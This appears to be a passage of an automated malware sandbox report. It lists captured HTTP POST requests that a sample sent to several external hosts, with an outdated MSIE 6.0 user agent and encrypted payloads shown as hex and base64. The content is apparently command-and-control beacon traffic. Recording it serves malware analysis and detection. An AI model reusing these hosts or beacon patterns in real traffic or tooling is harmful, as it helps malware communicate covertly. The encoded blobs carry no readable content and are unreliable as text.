74 45 56 62 2b 38 50 2b 32 37 65 36 2b 50 48 4e 6e 56 47 50 5a 66 6f 47 34 31 71 65 7a 73 78 35 61 6c 78 52 48 69 33 37 55 33 65 64 52 6c 74 70 61 42 38 33 6b 47 69 6f 39 44 54 54 67 78 68 56 63 6e 72 6d 35 65 69 49 43 75 6f 49 52 4e 45 4b 4e 59 77 63 72 34 78 52 56 44 59 4d 64 33 4a 5a 78 77 46 45 73 30 2b 6c 45 2f 48 78 5a 44 46 63 43 6c 31 64 49 33 56 36 6a 43 45 2f 7a 6c 5a 77 64 49 4d 41 57 4b 6f 48 75 45 68 6b 2f 6e 73 6e 53 68 46 50 45 32 73 6f 34 43 68 34 32 2b 56 34 6f 7a 37 41 6d 5a 6c 41 73 55 4d 36 6c 52 70 44 79 69 6b 34 57 43 53 34 62 50 75 2f 64 49 2b 4c 49 4b 2f 54 65 61 79 34 36 74 31 62 58 4b 6c 4c 56 73 45 49 42 6c 68 34 2f 4e 47 33 53 70 43 6e 57 6b 4e 63 6c 70 78 53 43 62 65 48 69 6a 44 4c 2b 75 59 42 62 6e 72 32 79 75 67 4e 48 36 5a 6d 61 44 52 41 55 2b 4a 35 2f 32 6c 4c 4c 35 46 62 76 6e 54 37 6f 66 68 4d 65 42 58 4d 38 69 4b 4a 2f 70 4e 66 42 4d 7a 79 4b 4e 2f 36 75 34 71 6e 71 32 6b 6b 58 6a 6a 6c 6d 47 32 39 56 66 7a 77 64 72 54 6d 53 52 7a 48 65 73 5a 41 35 76 41 74 48 37 32 36 33 62 57 53 33 6b 5a 63 78 76 51 67 45 30 6d 6b 56 65 72 42 2b 57 78 76 51 66 79 73 2b 45 48 59 54 65 73 6b 43 71 45 31 73 2b 53 51 36 42 34 4c 6e 53 67 43 65 58 4c 47 4a 4f 35 52 68 57 59 68 43 67 3d 3d Data Ascii: I6/zBLQlZ9dmyrf0D5VF9Ae/VPesmKIEKL5/5XTITq1czLtqXQ2d67z9oOb7bm87D0R2Ovx9EvJgHEdy4JzLW0Sb+yx2Uw8QQ3Vymp4G4MTTvbqJRhccOl6KbTFCn4BD0BydLjL7FWol7OkvtEVb+8P+27e6+PHNnVGPZfoG41qezsx5alxRHi37U3edRltpaB83kGio9DTTgxhVcnrm5eiICuoIRNEKNYwcr4xRVDYMd3JZxwFEs0+lE/HxZDFcCl1dI3V6jCE/zlZwdIMAWKoHuEhk/nsnShFPE2so4Ch42+V4oz7AmZlAsUM6lRpDyik4WCS4bPu/dI+LIK/Teay46t1bXKlLVsEIBlh4/NG3SpCnWkNclpxSCbeHijDL+uYBbnr2yugNH6ZmaDRAU+J5/2lLL5FbvnT7ofhMeBXM8iKJ/pNfBMzyKN/6u4qnq2kkXjjlmG29VfzwdrTmSRzHesZA5vAtH7263bWS3kZcxvQgE0mkVerB+WxvQfys+EHYTeskCqE1s+SQ6B4LnSgCeXLGJO5RhWYhCg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 63 64 62 2f 2f 4b 4c 6a 5a 74 65 70 75 4c 47 46 46 51 34 74 5a 69 57 6c 65 73 30 79 6f 4d 58 63 39 73 73 35 7a 53 49 6e 41 4a 48 39 75 75 73 51 4c 6d 65 6b 73 47 41 63 7a 6f 45 47 37 65 75 43 7a 6c 45 73 52 38 35 59 72 78 4a 6b 74 4e 68 4e 33 67 4b 4f 33 36 39 71 42 31 34 5a 37 45 38 70 41 74 65 51 75 4e 7a 55 6a 45 71 68 39 4b 34 42 6e 6e 64 76 58 32 44 2b 38 34 79 34 4d 77 64 32 2f 53 2b 37 56 6f 7a 77 4d 63 47 77 4e 67 6f 55 43 42 78 54 50 52 6d 45 34 4f 6a 65 2b 6b 30 72 64 6d 36 4e 56 75 4a 4d 79 2f 47 49 6d 70 76 4c 61 52 48 4b 61 65 68 75 42 69 38 4e 78 42 71 62 2b 70 58 75 46 72 33 70 55 43 7a 45 6c 46 4b 38 39 51 31 75 51 70 49 4c 44 67 6c 77 6c 74 63 31 56 66 62 75 79 75 34 45 76 74 30 58 73 49 2f 34 77 6a 31 35 43 50 42 32 30 77 62 75 46 32 30 52 4e 34 4e 6d 65 53 59 74 6b 47 74 43 34 68 52 6f 46 76 75 54 6e 70 69 39 76 77 39 45 50 31 78 61 6a 35 32 36 4a 34 74 6a 4b 45 71 77 4d 43 49 50 53 56 42 55 78 74 74 2f 38 63 59 61 6c 66 4f 53 39 68 49 72 31 6b 78 77 4f 6d 50 58 31 4a 6a 69 32 6b 72 45 72 7a 77 51 48 79 4b 6c 49 30 42 6a 6a 6c 6b 2f 58 77 64 4e 63 79 45 76 71 51 39 6e 4c 4a 65 41 65 50 63 57 63 62 6f 4a 66 51 6e 42 32 46 64 4c 39 45 50 42 54 6f 78 57 2f 73 51 52 6d 31 32 4f 4f 32 2f 75 51 73 54 33 61 55 36 74 7a 55 72 61 71 79 73 63 49 6d 79 53 57 53 6f 37 78 6e 52 53 38 79 35 35 64 53 4a 61 65 64 49 65 68 68 51 52 47 64 4d 39 52 65 53 52 56 71 67 73 32 68 4f 35 76 66 4d 64 33 50 48 6a 52 5a 44 32 7a 50 4d 33 6a 41 35 6b 77 70 66 47 34 67 71 74 37 51 57 2b 47 58 33 2b 4b 4a 4e 56 49 67 2f 37 34 44 4e 62 70 54 42 6b 70 4d 58 44 72 47 43 63 34 62 64 37 2b 76 35 46 61 4b 44 43 74 5a 51 77 76 53 39 66 63 30 59 3d Data Ascii: cdb//KLjZtepuLGFFQ4tZiWles0yoMXc9ss5zSInAJH9uusQLmeksGAczoEG7euCzlEsR85YrxJktNhN3gKO369qB14Z7E8pAteQuNzUjEqh9K4BnndvX2D+84y4Mwd2/S+7VozwMcGwNgoUCBxTPRmE4Oje+k0rdm6NVuJMy/GImpvLaRHKaehuBi8NxBqb+pXuFr3pUCzElFK89Q1uQpILDglwltc1Vfbuyu4Evt0XsI/4wj15CPB20wbuF20RN4NmeSYtkGtC4hRoFvuTnpi9vw9EP1xaj526J4tjKEqwMCIPSVBUxtt/8cYalfOS9hIr1kxwOmPX1Jji2krErzwQHyKlI0Bjjlk/XwdNcyEvqQ9nLJeAePcWcboJfQnB2FdL9EPBToxW/sQRm12OO2/uQsT3aU6tzUraqyscImySWSo7xnRS8y55dSJaedIehhQRGdM9ReSRVqgs2hO5vfMd3PHjRZD2zPM3jA5kwpfG4gqt7QW+GX3+KJNVIg/74DNbpTBkpMXDrGCc4bd7+v5FaKDCtZQwvS9fc0Y=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 43 54 2b 38 41 4b 67 43 5a 39 63 49 63 49 41 66 61 77 55 68 65 68 74 49 42 53 79 77 65 73 54 51 58 4d 67 66 79 58 59 42 44 48 54 4b 56 71 43 36 54 53 75 2b 37 62 43 30 2b 6d 79 32 4c 75 68 2f 45 55 77 44 71 4c 4f 77 4f 6a 65 75 61 56 6c 61 44 61 6b 75 36 77 50 72 77 69 5a 48 32 36 62 31 4e 4c 66 45 4e 67 59 58 64 6e 58 47 58 6a 64 7a 79 69 4f 75 77 65 69 42 67 6a 42 47 34 79 33 75 4e 72 76 76 56 52 62 75 50 70 6f 42 45 32 4b 43 42 30 4d 33 75 61 4b 66 4d 4c 48 76 30 4a 36 65 69 62 2b 72 30 67 30 49 34 39 47 76 61 38 7a 47 6f 47 35 46 2f 65 78 6c 6c 77 34 6d 67 36 49 4b 4c 6b 54 39 6d 2b 4a 38 64 47 33 51 65 56 46 2b 38 45 58 6c 4f 71 63 58 75 52 54 31 4d 66 72 70 44 69 6a 52 47 49 45 48 59 31 69 33 70 79 43 2f 50 65 37 4d 6c 53 38 64 54 49 51 6b 43 58 48 7a 70 6c 79 79 65 68 72 53 44 49 45 66 36 6a 67 5a 2f 58 68 57 51 49 55 38 38 2b 30 47 7a 2f 79 31 55 44 2b 4c 32 46 30 6b 6c 58 31 49 39 39 64 33 45 47 51 48 34 36 2b 59 4a 52 6d 52 66 56 30 52 4f 4f 5a 48 79 72 68 35 44 54 52 51 52 2b 35 4f 6d 69 61 51 30 70 62 59 56 6d 6a 71 39 37 2f 4e 33 34 70 38 46 51 4d 77 6e 6c 4f 59 6f 61 62 50 45 63 34 54 48 43 53 70 59 45 6d 61 4d 2f 59 4c 45 2b 53 47 49 30 4b 5a 33 78 77 57 75 43 4e 63 62 4b 7a 4e 55 78 55 67 78 34 4d 36 51 42 50 4d 41 54 63 43 78 6c 39 32 61 37 38 54 6c 66 76 73 34 39 6e 63 53 6a 4f 38 62 63 31 75 66 35 31 52 7a 30 55 71 43 6c 38 56 65 6b 66 6a 2b 38 6e 32 61 52 32 6a 62 48 35 62 64 2b 56 6b 47 35 2b 50 37 6f 4b 49 47 4c 55 4f 2f 4b 78 75 2f 71 31 65 59 4d 4e 64 64 63 37 32 63 32 4a 31 47 69 62 79 6f 73 4f 63 39 57 6c 4c 4d 59 39 49 53 75 6e 36 6a 48 33 67 57 73 71 6a 34 55 6d 51 31 4c 5a 68 2b 35 52 75 36 4a 2f 73 43 2b 74 63 56 58 63 73 59 42 67 44 35 46 54 50 Data Ascii: CT+8AKgCZ9cIcIAfawUhehtIBSywesTQXMgfyXYBDHTKVqC6TSu+7bC0+my2Luh/EUwDqLOwOjeuaVlaDaku6wPrwiZH26b1NLfENgYXdnXGXjdzyiOuweiBgjBG4y3uNrvvVRbuPpoBE2KCB0M3uaKfMLHv0J6eib+r0g0I49Gva8zGoG5F/exllw4mg6IKLkT9m+J8dG3QeVF+8EXlOqcXuRT1MfrpDijRGIEHY1i3pyC/Pe7MlS8dTIQkCXHzplyyehrSDIEf6jgZ/XhWQIU88+0Gz/y1UD+L2F0klX1I99d3EGQH46+YJRmRfV0ROOZHyrh5DTRQR+5OmiaQ0pbYVmjq97/N34p8FQMwnlOYoabPEc4THCSpYEmaM/YLE+SGI0KZ3xwWuCNcbKzNUxUgx4M6QBPMATcCxl92a78Tlfvs49ncSjO8bc1uf51Rz0UqCl8Vekfj+8n2aR2jbH5bd+VkG5+P7oKIGLUO/Kxu/q1eYMNddc72c2J1GibyosOc9WlLMY9ISun6jH3gWsqj4UmQ1LZh+5Ru6J/sC+tcVXcsYBgD5FTP
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 44 75 72 73 30 68 54 57 62 64 63 6c 49 4c 63 6e 37 38 70 43 32 47 65 75 49 5a 69 4d 4d 4d 73 32 69 41 54 50 72 36 66 78 79 4c 31 58 31 4c 38 45 5a 7a 71 63 69 66 4f 35 59 59 6d 47 6f 2b 41 31 58 41 68 72 44 32 49 66 71 47 75 6b 57 42 51 4b 72 62 74 36 78 63 6b 51 64 31 37 6e 4b 70 73 4b 72 79 37 4b 49 38 47 68 66 70 4a 31 58 2b 36 6f 47 56 4f 45 7a 4d 75 35 55 2f 35 48 2b 4a 4a 75 48 32 2b 4c 70 6d 77 54 74 4b 69 2f 6c 32 61 32 6b 49 42 50 7a 7a 31 61 6d 59 6c 76 77 70 43 77 67 55 30 30 47 42 6e 6e 46 30 59 32 68 57 31 44 66 65 51 6d 44 72 76 35 7a 32 4c 36 2b 72 79 2f 6c 30 42 52 6e 6a 45 68 6a 65 74 4a 70 6d 56 69 37 41 4d 71 68 65 41 50 42 62 4f 42 79 41 4e 2b 31 42 63 6b 69 71 48 69 4b 55 42 43 6e 38 46 64 4f 4f 30 7a 6e 64 6f 55 43 55 6d 33 52 52 44 61 35 69 68 6e 37 2b 39 4a 32 45 6b 2b 61 63 57 57 6b 79 46 39 6f 51 59 6f 4d 64 46 44 78 6e 4f 54 75 4a 48 70 55 79 75 69 43 69 41 4a 4c 36 54 41 65 32 48 5a 44 37 74 42 6d 7a 54 47 75 7a 7a 37 57 78 49 4a 75 46 33 4d 66 41 63 35 33 34 65 78 42 42 6f 71 36 57 52 62 65 47 55 77 78 48 4d 72 38 39 41 77 47 62 4e 45 65 37 36 45 6e 65 57 33 57 64 33 4b 36 59 4a 62 62 74 76 70 63 51 65 67 30 4d 79 33 44 79 4e 75 39 50 68 45 6c 6f 77 74 62 69 44 4f 59 39 69 65 65 42 7a 55 46 51 56 48 44 55 54 62 43 53 37 31 45 48 76 56 34 5a 76 55 6f 44 79 52 4d 52 71 79 51 68 42 37 51 79 6e 36 55 4b 7a 41 6c 51 57 58 2b 2f 4a 4e 62 56 4e 33 76 66 51 54 32 62 58 4b 2f 5a 77 4d 6d 69 36 69 50 58 56 65 30 77 7a 46 44 7a 59 71 32 47 4d 38 75 6a 5a 66 38 51 56 4c 43 4f 46 74 56 47 4b 62 7a 4f 76 53 65 56 63 6e 74 6a 2f 71 6c 45 66 35 34 53 51 50 38 6b 70 42 2b 57 50 6e 75 79 6f 3d Data Ascii: Durs0hTWbdclILcn78pC2GeuIZiMMMs2iATPr6fxyL1X1L8EZzqcifO5YYmGo+A1XAhrD2IfqGukWBQKrbt6xckQd17nKpsKry7KI8GhfpJ1X+6oGVOEzMu5U/5H+JJuH2+LpmwTtKi/l2a2kIBPzz1amYlvwpCwgU00GBnnF0Y2hW1DfeQmDrv5z2L6+ry/l0BRnjEhjetJpmVi7AMqheAPBbOByAN+1BckiqHiKUBCn8FdOO0zndoUCUm3RRDa5ihn7+9J2Ek+acWWkyF9oQYoMdFDxnOTuJHpUyuiCiAJL6TAe2HZD7tBmzTGuzz7WxIJuF3MfAc534exBBoq6WRbeGUwxHMr89AwGbNEe76EneW3Wd3K6YJbbtvpcQeg0My3DyNu9PhElowtbiDOY9ieeBzUFQVHDUTbCS71EHvV4ZvUoDyRMRqyQhB7Qyn6UKzAlQWX+/JNbVN3vfQT2bXK/ZwMmi6iPXVe0wzFDzYq2GM8ujZf8QVLCOFtVGKbzOvSeVcntj/qlEf54SQP8kpB+WPnuyo=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 6e 39 50 78 76 61 67 6e 62 64 63 61 32 71 72 71 61 2b 59 75 69 68 75 31 58 33 32 77 38 38 6d 65 58 4d 58 39 31 4b 4a 49 69 46 75 44 46 67 39 35 4d 36 74 31 47 75 74 36 71 6e 70 4d 42 53 73 70 57 75 72 6a 75 68 48 5a 54 6b 55 4a 4f 37 57 53 42 4f 34 6d 31 74 4b 67 64 31 58 78 75 4a 63 31 37 4f 6a 62 41 79 38 7a 4d 36 4a 35 39 38 78 77 43 6a 56 78 48 6e 2b 30 46 62 6b 6f 64 44 52 4f 4c 75 77 51 43 35 66 58 63 4f 37 53 33 79 44 48 66 35 50 78 6e 4b 2b 37 36 54 6b 44 75 75 61 50 44 4e 55 34 34 67 64 67 78 44 59 69 39 78 46 74 41 72 61 75 49 4f 6a 6f 34 58 64 4f 49 61 64 39 57 68 33 6c 6e 41 4e 70 73 69 47 61 62 2b 6c 69 4e 2b 79 69 68 6e 64 76 41 6f 7a 65 66 42 37 71 50 56 55 43 69 36 34 6b 54 4a 75 5a 37 74 2f 34 45 32 61 66 77 39 43 4c 41 58 39 61 64 39 6f 31 35 38 44 48 73 6f 30 4e 41 55 41 69 55 78 6b 65 6d 64 65 37 69 61 6d 66 37 72 2f 36 55 64 48 39 70 4e 57 6b 67 42 50 39 51 48 47 73 4c 71 44 75 47 69 48 39 74 78 4e 65 32 66 70 79 33 57 47 57 4d 63 78 2f 75 6f 4e 66 4e 61 51 6c 62 70 31 66 74 4b 6f 31 46 59 55 32 68 44 44 56 56 38 6b 7a 4a 62 49 57 6c 6e 54 65 76 76 32 57 6f 42 53 73 59 43 5a 4b 66 53 2f 2b 52 4c 57 37 38 4a 6f 4d 69 39 43 6b 5a 34 4c 5a 6f 78 53 78 73 79 35 52 72 69 2b 6a 6d 74 46 31 44 52 74 59 35 63 2f 63 65 72 32 65 5a 47 6c 51 4f 6e 47 4a 39 43 53 59 52 79 41 43 4d 47 52 68 53 6b 44 4c 4f 2f 41 76 7a 69 32 72 56 4b 59 72 73 35 44 4d 41 63 77 35 54 77 78 58 7a 56 54 7a 37 48 37 42 2b 5a 30 2b 52 41 58 41 52 30 42 52 66 4f 48 6d 67 70 41 78 6f 43 53 59 70 4c 6f 6b 4b 67 79 38 4a 49 57 38 59 33 71 62 48 44 78 61 49 6e 2f 66 39 4f 52 61 74 50 34 35 6f 75 77 75 4c 36 6f 77 6c 32 44 52 35 64 30 37 4f 56 54 4f 68 41 3d 3d Data Ascii: n9Pxvagnbdca2qrqa+Yuihu1X32w88meXMX91KJIiFuDFg95M6t1Gut6qnpMBSspWurjuhHZTkUJO7WSBO4m1tKgd1XxuJc17OjbAy8zM6J598xwCjVxHn+0FbkodDROLuwQC5fXcO7S3yDHf5PxnK+76TkDuuaPDNU44gdgxDYi9xFtArauIOjo4XdOIad9Wh3lnANpsiGab+liN+yihndvAozefB7qPVUCi64kTJuZ7t/4E2afw9CLAX9ad9o158DHso0NAUAiUxkemde7iamf7r/6UdH9pNWkgBP9QHGsLqDuGiH9txNe2fpy3WGWMcx/uoNfNaQlbp1ftKo1FYU2hDDVV8kzJbIWlnTevv2WoBSsYCZKfS/+RLW78JoMi9CkZ4LZoxSxsy5Rri+jmtF1DRtY5c/cer2eZGlQOnGJ9CSYRyACMGRhSkDLO/Avzi2rVKYrs5DMAcw5TwxXzVTz7H7B+Z0+RAXAR0BRfOHmgpAxoCSYpLokKgy8JIW8Y3qbHDxaIn/f9ORatP45ouwuL6owl2DR5d07OVTOhA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.alteor.clCache-Control: no-cacheData Raw: 30 65 61 4a 6d 54 78 4a 64 4e 66 4e 4c 4f 66 46 35 35 4e 67 71 63 38 54 68 72 62 55 68 6e 4f 70 4d 46 5a 48 57 32 7a 4d 49 6a 64 76 4c 38 68 7a 49 78 6f 6f 73 34 62 78 64 78 6b 75 75 64 79 59 30 6c 76 4e 57 44 4c 2f 66 2f 54 32 39 72 49 31 51 53 45 49 54 78 78 30 67 65 5a 4e 47 55 54 4b 42 42 71 46 38 30 32 4f 2f 65 36 62 46 7a 70 49 6d 6b 44 56 43 79 2f 70 36 4b 52 42 66 68 51 4a 76 2b 42 45 70 57 62 57 76 63 68 6f 37 6a 4b 44 72 62 6f 59 45 6d 75 77 75 2f 52 58 42 6d 4c 63 2f 49 57 4f 35 70 48 38 6c 47 55 47 70 6a 6e 71 46 75 52 50 33 58 4d 4e 77 56 54 73 70 75 76 78 4e 74 56 75 2b 71 4c 73 47 46 4f 67 45 36 78 4d 44 4a 4d 78 76 2b 35 4f 6b 36 76 6f 79 45 41 63 43 51 52 43 62 38 6f 45 54 41 42 71 77 71 74 66 49 4f 45 76 76 58 2f 4d 4c 2f 4b 49 34 73 79 76 52 69 50 2f 57 5a 79 66 54 6e 78 33 5a 76 38 34 68 73 36 4b 41 77 6a 56 6b 76 61 6f 2f 6b 72 46 51 32 50 55 75 49 65 37 6c 36 52 32 36 51 73 68 30 65 36 54 65 44 62 70 47 68 33 74 6f 31 47 41 68 4a 46 43 6e 51 5a 5a 75 34 48 68 78 71 66 56 61 42 4a 48 54 6b 6e 37 67 62 4a 58 4e 31 46 6b 59 70 58 35 71 78 42 51 6c 39 49 67 39 73 6e 36 30 4c 6a 66 31 56 49 36 58 58 73 51 2f 69 5a 55 6a 72 71 4c 74 34 64 74 75 77 39 6a 61 51 48 69 47 47 72 69 47 46 41 64 35 47 59 42 4f 49 43 37 35 4f 59 78 35 46 6d 66 4c 34 58 31 56 6e 70 37 58 30 52 74 66 74 78 6a 42 7a 54 67 49 33 50 52 34 51 32 38 53 37 62 66 54 41 42 59 57 36 51 2f 2f 37 41 65 76 30 6f 54 41 39 4a 69 39 6d 62 4f 55 68 6c 33 49 6c 51 58 50 44 38 62 52 41 72 30 41 4e 50 31 47 5a 6f 77 44 66 75 6f 69 57 6e 69 66 7a 34 55 72 50 63 59 45 45 63 39 6b 6e 76 4c 35 71 78 6c 55 4b 34 6f 65 33 31 56 51 52 59 6b 66 67 6c 2f 42 32 41 79 6f 77 3d 3d Data Ascii: 0eaJmTxJdNfNLOfF55Ngqc8ThrbUhnOpMFZHW2zMIjdvL8hzIxoos4bxdxkuudyY0lvNWDL/f/T29rI1QSEITxx0geZNGUTKBBqF802O/e6bFzpImkDVCy/p6KRBfhQJv+BEpWbWvcho7jKDrboYEmuwu/RXBmLc/IWO5pH8lGUGpjnqFuRP3XMNwVTspuvxNtVu+qLsGFOgE6xMDJMxv+5Ok6voyEAcCQRCb8oETABqwqtfIOEvvX/ML/KI4syvRiP/WZyfTnx3Zv84hs6KAwjVkvao/krFQ2PUuIe7l6R26Qsh0e6TeDbpGh3to1GAhJFCnQZZu4HhxqfVaBJHTkn7gbJXN1FkYpX5qxBQl9Ig9sn60Ljf1VI6XXsQ/iZUjrqLt4dtuw9jaQHiGGriGFAd5GYBOIC75OYx5FmfL4X1Vnp7X0RtftxjBzTgI3PR4Q28S7bfTABYW6Q//7Aev0oTA9Ji9mbOUhl3IlQXPD8bRAr0ANP1GZowDfuoiWnifz4UrPcYEEc9knvL5qxlUK4oe31VQRYkfgl/B2Ayow==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 5a 6a 66 4c 6d 56 70 4c 64 4e 64 41 67 32 79 58 66 61 49 6d 33 35 30 39 32 74 39 4b 50 68 6a 47 4c 70 4e 67 61 33 35 48 4a 5a 63 71 54 2b 30 75 64 67 35 44 56 54 49 37 2b 78 6e 31 45 4a 53 56 76 6c 47 44 54 32 56 49 48 7a 31 42 67 32 55 46 68 36 67 77 55 77 5a 79 74 2f 65 47 7a 68 34 2b 63 38 47 55 73 4e 72 44 68 58 7a 76 63 70 59 66 35 6b 77 58 62 30 2b 2b 64 59 54 6a 79 39 4c 6e 48 6e 32 5a 6e 6d 78 78 77 69 49 52 4b 31 30 4e 71 75 6c 51 54 48 36 79 75 53 53 57 55 31 38 62 67 79 73 6e 31 78 62 47 78 2b 41 78 4c 55 33 4f 4b 77 67 62 51 50 55 6d 31 58 31 6e 72 64 66 4c 4e 4b 38 50 49 42 74 37 2b 67 46 48 54 4d 41 72 73 76 4a 6a 63 37 57 66 4e 74 54 50 43 4a 58 56 4b 36 68 6c 61 7a 6c 6e 46 50 6f 2b 37 33 43 53 31 51 46 4f 38 71 43 36 48 76 68 39 47 56 57 68 51 62 64 51 2f 38 2f 74 5a 5a 6e 71 4f 47 68 6a 57 77 64 4c 74 4d 62 77 62 51 48 67 67 37 66 37 5a 73 45 39 59 58 64 30 46 6a 57 55 75 4b 50 39 57 6e 69 47 33 53 2b 49 32 33 61 4a 58 6f 36 41 66 4d 51 42 63 67 2b 76 63 72 59 46 32 45 41 4e 30 67 75 63 52 4d 33 57 43 71 37 4f 53 35 51 4d 53 2f 66 5a 50 2f 76 31 66 54 47 62 38 6f 45 67 50 72 41 6f 70 78 76 59 74 69 2f 48 54 72 6c 69 6d 6b 59 2f 37 42 57 46 6d 78 46 30 69 34 46 6b 50 46 68 6c 5a 6b 6b 55 76 6e 49 33 2b 57 30 56 72 44 77 65 58 30 45 4c 2b 56 49 67 52 4f 4b 58 71 72 68 65 62 51 4f 36 73 47 35 62 34 63 4b 4a 67 63 76 31 38 71 54 6e 38 50 39 4d 70 6d 5a 2f 64 78 43 4a 56 41 67 30 64 6f 47 4d 75 4c 2f 56 55 50 64 71 47 4a 61 2b 74 45 39 61 4e 75 6a 4d 45 37 69 62 6b 43 67 33 79 65 75 72 54 75 6d 70 42 55 35 63 51 70 35 44 43 37 6f 6c 69 33 61 54 75 37 6f 74 64 63 73 76 39 62 49 79 36 35 41 74 30 55 4f 4b 77 41 2b 5a 6f 74 54 66 75 78 69 45 6b 71 32 77 66 49 56 6d 55 4e 34 4c 34 49 4f 6d 73 49 79 6f 41 48 42 76 35 4e 50 64 Data Ascii: ZjfLmVpLdNdAg2yXfaIm35092t9KPhjGLpNga35HJZcqT+0udg5DVTI7+xn1EJSVvlGDT2VIHz1Bg2UFh6gwUwZyt/eGzh4+c8GUsNrDhXzvcpYf5kwXb0++dYTjy9LnHn2ZnmxxwiIRK10NqulQTH6yuSSWU18bgysn1xbGx+AxLU3OKwgbQPUm1X1nrdfLNK8PIBt7+gFHTMArsvJjc7WfNtTPCJXVK6hlazlnFPo+73CS1QFO8qC6Hvh9GVWhQbdQ/8/tZZnqOGhjWwdLtMbwbQHgg7f7ZsE9YXd0FjWUuKP9WniG3S+I23aJXo6AfMQBcg+vcrYF2EAN0gucRM3WCq7OS5QMS/fZP/v1fTGb8oEgPrAopxvYti/HTrlimkY/7BWFmxF0i4FkPFhlZkkUvnI3+W0VrDweX0EL+VIgROKXqrhebQO6sG5b4cKJgcv18qTn8P9MpmZ/dxCJVAg0doGMuL/VUPdqGJa+tE9aNujME7ibkCg3yeurTumpBU5cQp5DC7oli3aTu7otdcsv9bIy65At0UOKwA+ZotTfuxiEkq2wfIVmUN4L4IOmsIyoAHBv5NPd
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 2b 54 6d 75 76 58 59 6c 62 64 64 51 4a 58 31 2b 30 64 35 73 55 68 6c 4f 70 49 4f 57 43 48 44 51 43 71 46 66 42 37 6a 59 4a 70 67 61 79 43 34 42 4c 47 30 30 4e 64 30 59 56 6c 70 6f 64 76 33 4b 39 65 55 4d 48 76 6a 4c 2f 78 79 32 61 6f 51 30 6d 38 56 6f 69 56 39 55 6c 47 64 76 6f 53 37 4f 6e 76 75 59 55 36 7a 47 6e 62 59 6a 31 75 4e 79 75 5a 64 67 46 32 7a 79 4c 33 43 6a 67 73 79 41 74 46 4f 33 6a 33 51 63 79 36 6e 36 6f 35 69 55 73 69 6b 36 38 71 58 4b 76 6e 41 46 2b 6b 6a 2f 62 6c 65 43 47 30 6e 56 30 57 66 6d 49 6e 70 69 42 78 67 41 72 2b 75 65 79 44 61 76 37 4a 59 70 51 71 2b 4e 68 49 59 57 6b 74 7a 37 73 2b 6d 73 31 61 37 4f 6a 6f 42 54 50 66 58 55 75 4b 4c 53 4f 4c 6f 50 4f 33 75 34 46 78 50 39 6d 79 4a 50 79 58 33 69 6e 31 42 61 51 41 64 38 76 32 4a 4e 6c 33 48 42 72 53 64 36 6b 66 64 6d 48 4d 41 2b 6d 72 4d 6a 5a 68 34 5a 50 4b 78 78 4b 63 67 73 66 66 6c 68 6c 4f 49 6b 6c 37 39 75 74 52 69 30 4e 67 6c 50 63 36 35 6f 2f 6a 68 4c 4c 77 39 38 31 39 48 6a 65 4c 39 73 46 2f 30 44 36 56 44 44 50 45 2b 76 61 33 32 78 61 32 39 75 59 6b 41 57 70 79 35 46 4f 5a 78 6f 77 43 4f 39 4e 37 61 56 58 6e 79 46 73 34 6d 6c 6f 37 45 39 58 72 64 56 48 47 44 66 31 73 56 31 51 64 75 49 6f 68 45 30 47 2f 47 72 71 48 2f 6e 31 45 30 7a 7a 43 67 38 76 4f 43 63 65 41 64 50 6e 61 76 47 6a 63 48 57 53 79 69 69 41 49 34 58 49 4f 31 79 77 6e 67 6a 54 6e 64 73 30 31 54 4c 33 31 6d 32 79 46 62 30 4f 51 4c 51 35 46 44 50 4b 6e 35 70 54 2f 79 50 7a 35 71 41 68 4e 76 2b 47 78 39 52 70 4f 46 75 39 6b 6f 75 2f 63 73 32 4a 46 4d 52 4e 62 69 59 47 34 4a 47 2f 32 46 68 5a 69 33 4c 31 65 73 32 78 6b 41 74 6c 30 4d 5a 5a 55 77 46 Data Ascii: +TmuvXYlbddQJX1+0d5sUhlOpIOWCHDQCqFfB7jYJpgayC4BLG00Nd0YVlpodv3K9eUMHvjL/xy2aoQ0m8VoiV9UlGdvoS7OnvuYU6zGnbYj1uNyuZdgF2zyL3CjgsyAtFO3j3Qcy6n6o5iUsik68qXKvnAF+kj/bleCG0nV0WfmInpiBxgAr+ueyDav7JYpQq+NhIYWktz7s+ms1a7OjoBTPfXUuKLSOLoPO3u4FxP9myJPyX3in1BaQAd8v2JNl3HBrSd6kfdmHMA+mrMjZh4ZPKxxKcgsfflhlOIkl79utRi0NglPc65o/jhLLw9819HjeL9sF/0D6VDDPE+va32xa29uYkAWpy5FOZxowCO9N7aVXnyFs4mlo7E9XrdVHGDf1sV1QduIohE0G/GrqH/n1E0zzCg8vOCceAdPnavGjcHWSyiiAI4XIO1ywngjTnds01TL31m2yFb0OQLQ5FDPKn5pT/yPz5qAhNv+Gx9RpOFu9kou/cs2JFMRNbiYG4JG/2FhZi3L1es2xkAtl0MZZUwF
